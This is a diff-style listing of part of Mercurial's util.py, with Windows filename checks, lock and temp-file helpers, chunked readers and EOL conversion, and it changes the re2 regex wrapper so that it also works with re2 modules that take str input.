2046 2046 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2047 2047 "filename contains '\\x07', which is invalid on Windows"
2048 2048 >>> checkwinfilename(b"foo/bar/bla ")
2049 2049 "filename ends with ' ', which is not allowed on Windows"
2050 2050 >>> checkwinfilename(b"../bar")
2051 2051 >>> checkwinfilename(b"foo\\")
2052 2052 "filename ends with '\\', which is invalid on Windows"
2053 2053 >>> checkwinfilename(b"foo\\/bar")
2054 2054 "directory name ends with '\\', which is invalid on Windows"
2055 2055 """
2056 2056 if path.endswith(b'\\'):
2057 2057 return _(b"filename ends with '\\', which is invalid on Windows")
2058 2058 if b'\\/' in path:
2059 2059 return _(b"directory name ends with '\\', which is invalid on Windows")
2060 2060 for n in path.replace(b'\\', b'/').split(b'/'):
2061 2061 if not n:
2062 2062 continue
2063 2063 for c in _filenamebytestr(n):
2064 2064 if c in _winreservedchars:
2065 2065 return (
2066 2066 _(
2067 2067 b"filename contains '%s', which is reserved "
2068 2068 b"on Windows"
2069 2069 )
2070 2070 % c
2071 2071 )
2072 2072 if ord(c) <= 31:
2073 2073 return _(
2074 2074 b"filename contains '%s', which is invalid on Windows"
2075 2075 ) % stringutil.escapestr(c)
2076 2076 base = n.split(b'.')[0]
2077 2077 if base and base.lower() in _winreservednames:
2078 2078 return (
2079 2079 _(b"filename contains '%s', which is reserved on Windows")
2080 2080 % base
2081 2081 )
2082 2082 t = n[-1:]
2083 2083 if t in b'. ' and n not in b'..':
2084 2084 return (
2085 2085 _(
2086 2086 b"filename ends with '%s', which is not allowed "
2087 2087 b"on Windows"
2088 2088 )
2089 2089 % t
2090 2090 )
2091 2091
2092 2092
2093 2093 timer = getattr(time, "perf_counter", None)
2094 2094
2095 2095 if pycompat.iswindows:
2096 2096 checkosfilename = checkwinfilename
2097 2097 if not timer:
2098 2098 timer = time.clock
2099 2099 else:
2100 2100 # mercurial.windows doesn't have platform.checkosfilename
2101 2101 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2102 2102 if not timer:
2103 2103 timer = time.time
2104 2104
2105 2105
2106 2106 def makelock(info, pathname):
2107 2107 """Create a lock file atomically if possible
2108 2108
2109 2109 This may leave a stale lock file if symlink isn't supported and signal
2110 2110 interrupt is enabled.
2111 2111 """
2112 2112 try:
2113 2113 return os.symlink(info, pathname)
2114 2114 except OSError as why:
2115 2115 if why.errno == errno.EEXIST:
2116 2116 raise
2117 2117 except AttributeError: # no symlink in os
2118 2118 pass
2119 2119
2120 2120 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2121 2121 ld = os.open(pathname, flags)
2122 2122 os.write(ld, info)
2123 2123 os.close(ld)
2124 2124
2125 2125
2126 2126 def readlock(pathname):
2127 2127 # type: (bytes) -> bytes
2128 2128 try:
2129 2129 return readlink(pathname)
2130 2130 except OSError as why:
2131 2131 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2132 2132 raise
2133 2133 except AttributeError: # no symlink in os
2134 2134 pass
2135 2135 with posixfile(pathname, b'rb') as fp:
2136 2136 return fp.read()
2137 2137
2138 2138
2139 2139 def fstat(fp):
2140 2140 '''stat file object that may not have fileno method.'''
2141 2141 try:
2142 2142 return os.fstat(fp.fileno())
2143 2143 except AttributeError:
2144 2144 return os.stat(fp.name)
2145 2145
2146 2146
2147 2147 # File system features
2148 2148
2149 2149
2150 2150 def fscasesensitive(path):
2151 2151 # type: (bytes) -> bool
2152 2152 """
2153 2153 Return true if the given path is on a case-sensitive filesystem
2154 2154
2155 2155 Requires a path (like /foo/.hg) ending with a foldable final
2156 2156 directory component.
2157 2157 """
2158 2158 s1 = os.lstat(path)
2159 2159 d, b = os.path.split(path)
2160 2160 b2 = b.upper()
2161 2161 if b == b2:
2162 2162 b2 = b.lower()
2163 2163 if b == b2:
2164 2164 return True # no evidence against case sensitivity
2165 2165 p2 = os.path.join(d, b2)
2166 2166 try:
2167 2167 s2 = os.lstat(p2)
2168 2168 if s2 == s1:
2169 2169 return False
2170 2170 return True
2171 2171 except OSError:
2172 2172 return True
2173 2173
2174 2174
2175 _re2_input = lambda x: x
2175 2176 try:
2176 2177 import re2 # pytype: disable=import-error
2177 2178
2178 2179 _re2 = None
2179 2180 except ImportError:
2180 2181 _re2 = False
2181 2182
2182 2183
2183 2184 class _re(object):
2184 2185 def _checkre2(self):
2185 2186 global _re2
2187 global _re2_input
2186 2188 try:
2187 2189 # check if match works, see issue3964
2188 _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]'))
2190 check_pattern = br'\[([^\[]+)\]'
2191 check_input = b'[ui]'
2192 _re2 = bool(re2.match(check_pattern, check_input))
2189 2193 except ImportError:
2190 2194 _re2 = False
2195 except TypeError:
2196 # the `pyre-2` project provides a re2 module that accept bytes
2197 # the `fb-re2` project provides a re2 module that acccept sysstr
2198 check_pattern = pycompat.sysstr(check_pattern)
2199 check_input = pycompat.sysstr(check_input)
2200 _re2 = bool(re2.match(check_pattern, check_input))
2201 _re2_input = pycompat.sysstr
2191 2202
2192 2203 def compile(self, pat, flags=0):
2193 2204 """Compile a regular expression, using re2 if possible
2194 2205
2195 2206 For best performance, use only re2-compatible regexp features. The
2196 2207 only flags from the re module that are re2-compatible are
2197 2208 IGNORECASE and MULTILINE."""
2198 2209 if _re2 is None:
2199 2210 self._checkre2()
2200 2211 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2201 2212 if flags & remod.IGNORECASE:
2202 2213 pat = b'(?i)' + pat
2203 2214 if flags & remod.MULTILINE:
2204 2215 pat = b'(?m)' + pat
2205 2216 try:
2206 return re2.compile(pat)
2217 return re2.compile(_re2_input(pat))
2207 2218 except re2.error:
2208 2219 pass
2209 2220 return remod.compile(pat, flags)
2210 2221
2211 2222 @propertycache
2212 2223 def escape(self):
2213 2224 """Return the version of escape corresponding to self.compile.
2214 2225
2215 2226 This is imperfect because whether re2 or re is used for a particular
2216 2227 function depends on the flags, etc, but it's the best we can do.
2217 2228 """
2218 2229 global _re2
2219 2230 if _re2 is None:
2220 2231 self._checkre2()
2221 2232 if _re2:
2222 2233 return re2.escape
2223 2234 else:
2224 2235 return remod.escape
2225 2236
2226 2237
2227 2238 re = _re()
2228 2239
2229 2240 _fspathcache = {}
2230 2241
2231 2242
2232 2243 def fspath(name, root):
2233 2244 # type: (bytes, bytes) -> bytes
2234 2245 """Get name in the case stored in the filesystem
2235 2246
2236 2247 The name should be relative to root, and be normcase-ed for efficiency.
2237 2248
2238 2249 Note that this function is unnecessary, and should not be
2239 2250 called, for case-sensitive filesystems (simply because it's expensive).
2240 2251
2241 2252 The root should be normcase-ed, too.
2242 2253 """
2243 2254
2244 2255 def _makefspathcacheentry(dir):
2245 2256 return {normcase(n): n for n in os.listdir(dir)}
2246 2257
2247 2258 seps = pycompat.ossep
2248 2259 if pycompat.osaltsep:
2249 2260 seps = seps + pycompat.osaltsep
2250 2261 # Protect backslashes. This gets silly very quickly.
2251 2262 seps.replace(b'\\', b'\\\\')
2252 2263 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2253 2264 dir = os.path.normpath(root)
2254 2265 result = []
2255 2266 for part, sep in pattern.findall(name):
2256 2267 if sep:
2257 2268 result.append(sep)
2258 2269 continue
2259 2270
2260 2271 if dir not in _fspathcache:
2261 2272 _fspathcache[dir] = _makefspathcacheentry(dir)
2262 2273 contents = _fspathcache[dir]
2263 2274
2264 2275 found = contents.get(part)
2265 2276 if not found:
2266 2277 # retry "once per directory" per "dirstate.walk" which
2267 2278 # may take place for each patches of "hg qpush", for example
2268 2279 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2269 2280 found = contents.get(part)
2270 2281
2271 2282 result.append(found or part)
2272 2283 dir = os.path.join(dir, part)
2273 2284
2274 2285 return b''.join(result)
2275 2286
2276 2287
2277 2288 def checknlink(testfile):
2278 2289 # type: (bytes) -> bool
2279 2290 '''check whether hardlink count reporting works properly'''
2280 2291
2281 2292 # testfile may be open, so we need a separate file for checking to
2282 2293 # work around issue2543 (or testfile may get lost on Samba shares)
2283 2294 f1, f2, fp = None, None, None
2284 2295 try:
2285 2296 fd, f1 = pycompat.mkstemp(
2286 2297 prefix=b'.%s-' % os.path.basename(testfile),
2287 2298 suffix=b'1~',
2288 2299 dir=os.path.dirname(testfile),
2289 2300 )
2290 2301 os.close(fd)
2291 2302 f2 = b'%s2~' % f1[:-2]
2292 2303
2293 2304 oslink(f1, f2)
2294 2305 # nlinks() may behave differently for files on Windows shares if
2295 2306 # the file is open.
2296 2307 fp = posixfile(f2)
2297 2308 return nlinks(f2) > 1
2298 2309 except OSError:
2299 2310 return False
2300 2311 finally:
2301 2312 if fp is not None:
2302 2313 fp.close()
2303 2314 for f in (f1, f2):
2304 2315 try:
2305 2316 if f is not None:
2306 2317 os.unlink(f)
2307 2318 except OSError:
2308 2319 pass
2309 2320
2310 2321
2311 2322 def endswithsep(path):
2312 2323 # type: (bytes) -> bool
2313 2324 '''Check path ends with os.sep or os.altsep.'''
2314 2325 return bool( # help pytype
2315 2326 path.endswith(pycompat.ossep)
2316 2327 or pycompat.osaltsep
2317 2328 and path.endswith(pycompat.osaltsep)
2318 2329 )
2319 2330
2320 2331
2321 2332 def splitpath(path):
2322 2333 # type: (bytes) -> List[bytes]
2323 2334 """Split path by os.sep.
2324 2335 Note that this function does not use os.altsep because this is
2325 2336 an alternative of simple "xxx.split(os.sep)".
2326 2337 It is recommended to use os.path.normpath() before using this
2327 2338 function if need."""
2328 2339 return path.split(pycompat.ossep)
2329 2340
2330 2341
2331 2342 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2332 2343 """Create a temporary file with the same contents from name
2333 2344
2334 2345 The permission bits are copied from the original file.
2335 2346
2336 2347 If the temporary file is going to be truncated immediately, you
2337 2348 can use emptyok=True as an optimization.
2338 2349
2339 2350 Returns the name of the temporary file.
2340 2351 """
2341 2352 d, fn = os.path.split(name)
2342 2353 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2343 2354 os.close(fd)
2344 2355 # Temporary files are created with mode 0600, which is usually not
2345 2356 # what we want. If the original file already exists, just copy
2346 2357 # its mode. Otherwise, manually obey umask.
2347 2358 copymode(name, temp, createmode, enforcewritable)
2348 2359
2349 2360 if emptyok:
2350 2361 return temp
2351 2362 try:
2352 2363 try:
2353 2364 ifp = posixfile(name, b"rb")
2354 2365 except IOError as inst:
2355 2366 if inst.errno == errno.ENOENT:
2356 2367 return temp
2357 2368 if not getattr(inst, 'filename', None):
2358 2369 inst.filename = name
2359 2370 raise
2360 2371 ofp = posixfile(temp, b"wb")
2361 2372 for chunk in filechunkiter(ifp):
2362 2373 ofp.write(chunk)
2363 2374 ifp.close()
2364 2375 ofp.close()
2365 2376 except: # re-raises
2366 2377 try:
2367 2378 os.unlink(temp)
2368 2379 except OSError:
2369 2380 pass
2370 2381 raise
2371 2382 return temp
2372 2383
2373 2384
2374 2385 class filestat(object):
2375 2386 """help to exactly detect change of a file
2376 2387
2377 2388 'stat' attribute is result of 'os.stat()' if specified 'path'
2378 2389 exists. Otherwise, it is None. This can avoid preparative
2379 2390 'exists()' examination on client side of this class.
2380 2391 """
2381 2392
2382 2393 def __init__(self, stat):
2383 2394 self.stat = stat
2384 2395
2385 2396 @classmethod
2386 2397 def frompath(cls, path):
2387 2398 try:
2388 2399 stat = os.stat(path)
2389 2400 except OSError as err:
2390 2401 if err.errno != errno.ENOENT:
2391 2402 raise
2392 2403 stat = None
2393 2404 return cls(stat)
2394 2405
2395 2406 @classmethod
2396 2407 def fromfp(cls, fp):
2397 2408 stat = os.fstat(fp.fileno())
2398 2409 return cls(stat)
2399 2410
2400 2411 __hash__ = object.__hash__
2401 2412
2402 2413 def __eq__(self, old):
2403 2414 try:
2404 2415 # if ambiguity between stat of new and old file is
2405 2416 # avoided, comparison of size, ctime and mtime is enough
2406 2417 # to exactly detect change of a file regardless of platform
2407 2418 return (
2408 2419 self.stat.st_size == old.stat.st_size
2409 2420 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2410 2421 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2411 2422 )
2412 2423 except AttributeError:
2413 2424 pass
2414 2425 try:
2415 2426 return self.stat is None and old.stat is None
2416 2427 except AttributeError:
2417 2428 return False
2418 2429
2419 2430 def isambig(self, old):
2420 2431 """Examine whether new (= self) stat is ambiguous against old one
2421 2432
2422 2433 "S[N]" below means stat of a file at N-th change:
2423 2434
2424 2435 - S[n-1].ctime < S[n].ctime: can detect change of a file
2425 2436 - S[n-1].ctime == S[n].ctime
2426 2437 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2427 2438 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2428 2439 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2429 2440 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2430 2441
2431 2442 Case (*2) above means that a file was changed twice or more at
2432 2443 same time in sec (= S[n-1].ctime), and comparison of timestamp
2433 2444 is ambiguous.
2434 2445
2435 2446 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2436 2447 timestamp is ambiguous".
2437 2448
2438 2449 But advancing mtime only in case (*2) doesn't work as
2439 2450 expected, because naturally advanced S[n].mtime in case (*1)
2440 2451 might be equal to manually advanced S[n-1 or earlier].mtime.
2441 2452
2442 2453 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2443 2454 treated as ambiguous regardless of mtime, to avoid overlooking
2444 2455 by confliction between such mtime.
2445 2456
2446 2457 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2447 2458 S[n].mtime", even if size of a file isn't changed.
2448 2459 """
2449 2460 try:
2450 2461 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2451 2462 except AttributeError:
2452 2463 return False
2453 2464
2454 2465 def avoidambig(self, path, old):
2455 2466 """Change file stat of specified path to avoid ambiguity
2456 2467
2457 2468 'old' should be previous filestat of 'path'.
2458 2469
2459 2470 This skips avoiding ambiguity, if a process doesn't have
2460 2471 appropriate privileges for 'path'. This returns False in this
2461 2472 case.
2462 2473
2463 2474 Otherwise, this returns True, as "ambiguity is avoided".
2464 2475 """
2465 2476 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2466 2477 try:
2467 2478 os.utime(path, (advanced, advanced))
2468 2479 except OSError as inst:
2469 2480 if inst.errno == errno.EPERM:
2470 2481 # utime() on the file created by another user causes EPERM,
2471 2482 # if a process doesn't have appropriate privileges
2472 2483 return False
2473 2484 raise
2474 2485 return True
2475 2486
2476 2487 def __ne__(self, other):
2477 2488 return not self == other
2478 2489
2479 2490
2480 2491 class atomictempfile(object):
2481 2492 """writable file object that atomically updates a file
2482 2493
2483 2494 All writes will go to a temporary copy of the original file. Call
2484 2495 close() when you are done writing, and atomictempfile will rename
2485 2496 the temporary copy to the original name, making the changes
2486 2497 visible. If the object is destroyed without being closed, all your
2487 2498 writes are discarded.
2488 2499
2489 2500 checkambig argument of constructor is used with filestat, and is
2490 2501 useful only if target file is guarded by any lock (e.g. repo.lock
2491 2502 or repo.wlock).
2492 2503 """
2493 2504
2494 2505 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2495 2506 self.__name = name # permanent name
2496 2507 self._tempname = mktempcopy(
2497 2508 name,
2498 2509 emptyok=(b'w' in mode),
2499 2510 createmode=createmode,
2500 2511 enforcewritable=(b'w' in mode),
2501 2512 )
2502 2513
2503 2514 self._fp = posixfile(self._tempname, mode)
2504 2515 self._checkambig = checkambig
2505 2516
2506 2517 # delegated methods
2507 2518 self.read = self._fp.read
2508 2519 self.write = self._fp.write
2509 2520 self.seek = self._fp.seek
2510 2521 self.tell = self._fp.tell
2511 2522 self.fileno = self._fp.fileno
2512 2523
2513 2524 def close(self):
2514 2525 if not self._fp.closed:
2515 2526 self._fp.close()
2516 2527 filename = localpath(self.__name)
2517 2528 oldstat = self._checkambig and filestat.frompath(filename)
2518 2529 if oldstat and oldstat.stat:
2519 2530 rename(self._tempname, filename)
2520 2531 newstat = filestat.frompath(filename)
2521 2532 if newstat.isambig(oldstat):
2522 2533 # stat of changed file is ambiguous to original one
2523 2534 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2524 2535 os.utime(filename, (advanced, advanced))
2525 2536 else:
2526 2537 rename(self._tempname, filename)
2527 2538
2528 2539 def discard(self):
2529 2540 if not self._fp.closed:
2530 2541 try:
2531 2542 os.unlink(self._tempname)
2532 2543 except OSError:
2533 2544 pass
2534 2545 self._fp.close()
2535 2546
2536 2547 def __del__(self):
2537 2548 if safehasattr(self, '_fp'): # constructor actually did something
2538 2549 self.discard()
2539 2550
2540 2551 def __enter__(self):
2541 2552 return self
2542 2553
2543 2554 def __exit__(self, exctype, excvalue, traceback):
2544 2555 if exctype is not None:
2545 2556 self.discard()
2546 2557 else:
2547 2558 self.close()
2548 2559
2549 2560
2550 2561 def unlinkpath(f, ignoremissing=False, rmdir=True):
2551 2562 # type: (bytes, bool, bool) -> None
2552 2563 """unlink and remove the directory if it is empty"""
2553 2564 if ignoremissing:
2554 2565 tryunlink(f)
2555 2566 else:
2556 2567 unlink(f)
2557 2568 if rmdir:
2558 2569 # try removing directories that might now be empty
2559 2570 try:
2560 2571 removedirs(os.path.dirname(f))
2561 2572 except OSError:
2562 2573 pass
2563 2574
2564 2575
2565 2576 def tryunlink(f):
2566 2577 # type: (bytes) -> None
2567 2578 """Attempt to remove a file, ignoring ENOENT errors."""
2568 2579 try:
2569 2580 unlink(f)
2570 2581 except OSError as e:
2571 2582 if e.errno != errno.ENOENT:
2572 2583 raise
2573 2584
2574 2585
2575 2586 def makedirs(name, mode=None, notindexed=False):
2576 2587 # type: (bytes, Optional[int], bool) -> None
2577 2588 """recursive directory creation with parent mode inheritance
2578 2589
2579 2590 Newly created directories are marked as "not to be indexed by
2580 2591 the content indexing service", if ``notindexed`` is specified
2581 2592 for "write" mode access.
2582 2593 """
2583 2594 try:
2584 2595 makedir(name, notindexed)
2585 2596 except OSError as err:
2586 2597 if err.errno == errno.EEXIST:
2587 2598 return
2588 2599 if err.errno != errno.ENOENT or not name:
2589 2600 raise
2590 2601 parent = os.path.dirname(os.path.abspath(name))
2591 2602 if parent == name:
2592 2603 raise
2593 2604 makedirs(parent, mode, notindexed)
2594 2605 try:
2595 2606 makedir(name, notindexed)
2596 2607 except OSError as err:
2597 2608 # Catch EEXIST to handle races
2598 2609 if err.errno == errno.EEXIST:
2599 2610 return
2600 2611 raise
2601 2612 if mode is not None:
2602 2613 os.chmod(name, mode)
2603 2614
2604 2615
2605 2616 def readfile(path):
2606 2617 # type: (bytes) -> bytes
2607 2618 with open(path, b'rb') as fp:
2608 2619 return fp.read()
2609 2620
2610 2621
2611 2622 def writefile(path, text):
2612 2623 # type: (bytes, bytes) -> None
2613 2624 with open(path, b'wb') as fp:
2614 2625 fp.write(text)
2615 2626
2616 2627
2617 2628 def appendfile(path, text):
2618 2629 # type: (bytes, bytes) -> None
2619 2630 with open(path, b'ab') as fp:
2620 2631 fp.write(text)
2621 2632
2622 2633
2623 2634 class chunkbuffer(object):
2624 2635 """Allow arbitrary sized chunks of data to be efficiently read from an
2625 2636 iterator over chunks of arbitrary size."""
2626 2637
2627 2638 def __init__(self, in_iter):
2628 2639 """in_iter is the iterator that's iterating over the input chunks."""
2629 2640
2630 2641 def splitbig(chunks):
2631 2642 for chunk in chunks:
2632 2643 if len(chunk) > 2 ** 20:
2633 2644 pos = 0
2634 2645 while pos < len(chunk):
2635 2646 end = pos + 2 ** 18
2636 2647 yield chunk[pos:end]
2637 2648 pos = end
2638 2649 else:
2639 2650 yield chunk
2640 2651
2641 2652 self.iter = splitbig(in_iter)
2642 2653 self._queue = collections.deque()
2643 2654 self._chunkoffset = 0
2644 2655
2645 2656 def read(self, l=None):
2646 2657 """Read L bytes of data from the iterator of chunks of data.
2647 2658 Returns less than L bytes if the iterator runs dry.
2648 2659
2649 2660 If size parameter is omitted, read everything"""
2650 2661 if l is None:
2651 2662 return b''.join(self.iter)
2652 2663
2653 2664 left = l
2654 2665 buf = []
2655 2666 queue = self._queue
2656 2667 while left > 0:
2657 2668 # refill the queue
2658 2669 if not queue:
2659 2670 target = 2 ** 18
2660 2671 for chunk in self.iter:
2661 2672 queue.append(chunk)
2662 2673 target -= len(chunk)
2663 2674 if target <= 0:
2664 2675 break
2665 2676 if not queue:
2666 2677 break
2667 2678
2668 2679 # The easy way to do this would be to queue.popleft(), modify the
2669 2680 # chunk (if necessary), then queue.appendleft(). However, for cases
2670 2681 # where we read partial chunk content, this incurs 2 dequeue
2671 2682 # mutations and creates a new str for the remaining chunk in the
2672 2683 # queue. Our code below avoids this overhead.
2673 2684
2674 2685 chunk = queue[0]
2675 2686 chunkl = len(chunk)
2676 2687 offset = self._chunkoffset
2677 2688
2678 2689 # Use full chunk.
2679 2690 if offset == 0 and left >= chunkl:
2680 2691 left -= chunkl
2681 2692 queue.popleft()
2682 2693 buf.append(chunk)
2683 2694 # self._chunkoffset remains at 0.
2684 2695 continue
2685 2696
2686 2697 chunkremaining = chunkl - offset
2687 2698
2688 2699 # Use all of unconsumed part of chunk.
2689 2700 if left >= chunkremaining:
2690 2701 left -= chunkremaining
2691 2702 queue.popleft()
2692 2703 # offset == 0 is enabled by block above, so this won't merely
2693 2704 # copy via ``chunk[0:]``.
2694 2705 buf.append(chunk[offset:])
2695 2706 self._chunkoffset = 0
2696 2707
2697 2708 # Partial chunk needed.
2698 2709 else:
2699 2710 buf.append(chunk[offset : offset + left])
2700 2711 self._chunkoffset += left
2701 2712 left -= chunkremaining
2702 2713
2703 2714 return b''.join(buf)
2704 2715
2705 2716
2706 2717 def filechunkiter(f, size=131072, limit=None):
2707 2718 """Create a generator that produces the data in the file size
2708 2719 (default 131072) bytes at a time, up to optional limit (default is
2709 2720 to read all data). Chunks may be less than size bytes if the
2710 2721 chunk is the last chunk in the file, or the file is a socket or
2711 2722 some other type of file that sometimes reads less data than is
2712 2723 requested."""
2713 2724 assert size >= 0
2714 2725 assert limit is None or limit >= 0
2715 2726 while True:
2716 2727 if limit is None:
2717 2728 nbytes = size
2718 2729 else:
2719 2730 nbytes = min(limit, size)
2720 2731 s = nbytes and f.read(nbytes)
2721 2732 if not s:
2722 2733 break
2723 2734 if limit:
2724 2735 limit -= len(s)
2725 2736 yield s
2726 2737
2727 2738
2728 2739 class cappedreader(object):
2729 2740 """A file object proxy that allows reading up to N bytes.
2730 2741
2731 2742 Given a source file object, instances of this type allow reading up to
2732 2743 N bytes from that source file object. Attempts to read past the allowed
2733 2744 limit are treated as EOF.
2734 2745
2735 2746 It is assumed that I/O is not performed on the original file object
2736 2747 in addition to I/O that is performed by this instance. If there is,
2737 2748 state tracking will get out of sync and unexpected results will ensue.
2738 2749 """
2739 2750
2740 2751 def __init__(self, fh, limit):
2741 2752 """Allow reading up to <limit> bytes from <fh>."""
2742 2753 self._fh = fh
2743 2754 self._left = limit
2744 2755
2745 2756 def read(self, n=-1):
2746 2757 if not self._left:
2747 2758 return b''
2748 2759
2749 2760 if n < 0:
2750 2761 n = self._left
2751 2762
2752 2763 data = self._fh.read(min(n, self._left))
2753 2764 self._left -= len(data)
2754 2765 assert self._left >= 0
2755 2766
2756 2767 return data
2757 2768
2758 2769 def readinto(self, b):
2759 2770 res = self.read(len(b))
2760 2771 if res is None:
2761 2772 return None
2762 2773
2763 2774 b[0 : len(res)] = res
2764 2775 return len(res)
2765 2776
2766 2777
2767 2778 def unitcountfn(*unittable):
2768 2779 '''return a function that renders a readable count of some quantity'''
2769 2780
2770 2781 def go(count):
2771 2782 for multiplier, divisor, format in unittable:
2772 2783 if abs(count) >= divisor * multiplier:
2773 2784 return format % (count / float(divisor))
2774 2785 return unittable[-1][2] % count
2775 2786
2776 2787 return go
2777 2788
2778 2789
2779 2790 def processlinerange(fromline, toline):
2780 2791 # type: (int, int) -> Tuple[int, int]
2781 2792 """Check that linerange <fromline>:<toline> makes sense and return a
2782 2793 0-based range.
2783 2794
2784 2795 >>> processlinerange(10, 20)
2785 2796 (9, 20)
2786 2797 >>> processlinerange(2, 1)
2787 2798 Traceback (most recent call last):
2788 2799 ...
2789 2800 ParseError: line range must be positive
2790 2801 >>> processlinerange(0, 5)
2791 2802 Traceback (most recent call last):
2792 2803 ...
2793 2804 ParseError: fromline must be strictly positive
2794 2805 """
2795 2806 if toline - fromline < 0:
2796 2807 raise error.ParseError(_(b"line range must be positive"))
2797 2808 if fromline < 1:
2798 2809 raise error.ParseError(_(b"fromline must be strictly positive"))
2799 2810 return fromline - 1, toline
2800 2811
2801 2812
2802 2813 bytecount = unitcountfn(
2803 2814 (100, 1 << 30, _(b'%.0f GB')),
2804 2815 (10, 1 << 30, _(b'%.1f GB')),
2805 2816 (1, 1 << 30, _(b'%.2f GB')),
2806 2817 (100, 1 << 20, _(b'%.0f MB')),
2807 2818 (10, 1 << 20, _(b'%.1f MB')),
2808 2819 (1, 1 << 20, _(b'%.2f MB')),
2809 2820 (100, 1 << 10, _(b'%.0f KB')),
2810 2821 (10, 1 << 10, _(b'%.1f KB')),
2811 2822 (1, 1 << 10, _(b'%.2f KB')),
2812 2823 (1, 1, _(b'%.0f bytes')),
2813 2824 )
2814 2825
2815 2826
2816 2827 class transformingwriter(object):
2817 2828 """Writable file wrapper to transform data by function"""
2818 2829
2819 2830 def __init__(self, fp, encode):
2820 2831 self._fp = fp
2821 2832 self._encode = encode
2822 2833
2823 2834 def close(self):
2824 2835 self._fp.close()
2825 2836
2826 2837 def flush(self):
2827 2838 self._fp.flush()
2828 2839
2829 2840 def write(self, data):
2830 2841 return self._fp.write(self._encode(data))
2831 2842
2832 2843
2833 2844 # Matches a single EOL which can either be a CRLF where repeated CR
2834 2845 # are removed or a LF. We do not care about old Macintosh files, so a
2835 2846 # stray CR is an error.
2836 2847 _eolre = remod.compile(br'\r*\n')
2837 2848
2838 2849
2839 2850 def tolf(s):
2840 2851 # type: (bytes) -> bytes
2841 2852 return _eolre.sub(b'\n', s)
2842 2853
2843 2854
2844 2855 def tocrlf(s):
2845 2856 # type: (bytes) -> bytes
2846 2857 return _eolre.sub(b'\r\n', s)
2847 2858
2848 2859
2849 2860 def _crlfwriter(fp):
2850 2861 return transformingwriter(fp, tocrlf)
2851 2862
2852 2863
2853 2864 if pycompat.oslinesep == b'\r\n':
2854 2865 tonativeeol = tocrlf
2855 2866 fromnativeeol = tolf
2856 2867 nativeeolwriter = _crlfwriter
2857 2868 else:
2858 2869 tonativeeol = pycompat.identity
2859 2870 fromnativeeol = pycompat.identity
2860 2871 nativeeolwriter = pycompat.identity
2861 2872
2862 2873 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2863 2874 3,
2864 2875 0,
2865 2876 ):
2866 2877 # There is an issue in CPython that some IO methods do not handle EINTR
2867 2878 # correctly. The following table shows what CPython version (and functions)
2868 2879 # are affected (buggy: has the EINTR bug, okay: otherwise):
2869 2880 #
2870 2881 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2871 2882 # --------------------------------------------------
2872 2883 # fp.__iter__ | buggy | buggy | okay
2873 2884 # fp.read* | buggy | okay [1] | okay
2874 2885 #
2875 2886 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2876 2887 #
2877 2888 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2878 2889 # like "read*" work fine, as we do not support Python < 2.7.4.
2879 2890 #
2880 2891 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2881 2892 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2882 2893 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2883 2894 # fp.__iter__ but not other fp.read* methods.
2884 2895 #
2885 2896 # On modern systems like Linux, the "read" syscall cannot be interrupted
2886 2897 # when reading "fast" files like on-disk files. So the EINTR issue only
2887 2898 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2888 2899 # files approximately as "fast" files and use the fast (unsafe) code path,
2889 2900 # to minimize the performance impact.
2890 2901
2891 2902 def iterfile(fp):
2892 2903 fastpath = True
2893 2904 if type(fp) is file:
2894 2905 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2895 2906 if fastpath:
2896 2907 return fp
2897 2908 else:
2898 2909 # fp.readline deals with EINTR correctly, use it as a workaround.
2899 2910 return iter(fp.readline, b'')
2900 2911
2901 2912
2902 2913 else:
2903 2914 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2904 2915 def iterfile(fp):
2905 2916 return fp
2906 2917
2907 2918
2908 2919 def iterlines(iterator):
2909 2920 # type: (Iterator[bytes]) -> Iterator[bytes]
2910 2921 for chunk in iterator:
2911 2922 for line in chunk.splitlines():
2912 2923 yield line
2913 2924
2914 2925
2915 2926 def expandpath(path):
2916 2927 # type: (bytes) -> bytes
2917 2928 return os.path.expanduser(os.path.expandvars(path))
2918 2929
2919 2930
2920 2931 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2921 2932 """Return the result of interpolating items in the mapping into string s.
2922 2933
2923 2934 prefix is a single character string, or a two character string with
2924 2935 a backslash as the first character if the prefix needs to be escaped in
2925 2936 a regular expression.
2926 2937
2927 2938 fn is an optional function that will be applied to the replacement text
2928 2939 just before replacement.
2929 2940
2930 2941 escape_prefix is an optional flag that allows using doubled prefix for
2931 2942 its escaping.
2932 2943 """
2933 2944 fn = fn or (lambda s: s)
2934 2945 patterns = b'|'.join(mapping.keys())
2935 2946 if escape_prefix:
2936 2947 patterns += b'|' + prefix
2937 2948 if len(prefix) > 1:
